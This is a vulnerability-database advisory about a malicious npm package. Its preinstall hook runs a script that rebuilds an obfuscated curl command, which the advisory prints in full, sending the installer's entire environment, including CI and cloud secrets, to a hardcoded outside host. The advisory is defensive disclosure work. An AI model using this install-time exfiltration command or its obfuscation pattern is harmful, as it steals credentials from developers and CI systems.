VDB

GCVE-110-OSM-2026-13418

GCVE-110-OSM-2026-13418
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published October 8, 2026
package.json declares a preinstall lifecycle script `sh./test.sh`. test.sh assembles a `curl -d "$(env)" https://abbishal.com/sh/installation-success` command by splitting the tokens `curl`, `env`, and `-d` across single-character shell variables (`i=c`, `s=u`, `a=rl`, `t=en`) and reconstructing them via variable concatenation and command substitution. On `npm install` this POSTs the entire output of `env` — the installer shell/CI's full process environment, including any exported secrets such as CI tokens, cloud credentials (AWS_*, GCP, Azure), and npm publish tokens — to a hardcoded third-party host. The README asserts that the package performs no network requests, no filesystem access, no data collection, and has no preinstall/postinstall lifecycle scripts, directly contradicting the shipped manifest and script. The variable-fragment obfuscation and the cover-story README indicate deliberate evasion rather than a legitimate placeholder or canary. ENTRY colours.scss (main: colours.scss) - Preinstall Script in package.json: ""preinstall": "sh ./test.sh"" ADDITIONAL FINDINGS - Brand New Package - Very New NPM Publisher Account

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownabbishal-poc-as-dependencyall (affected)—

References

advisory
vendor

Browse GCVE Records

3,328 records in the GCVE database · Updated October 10, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›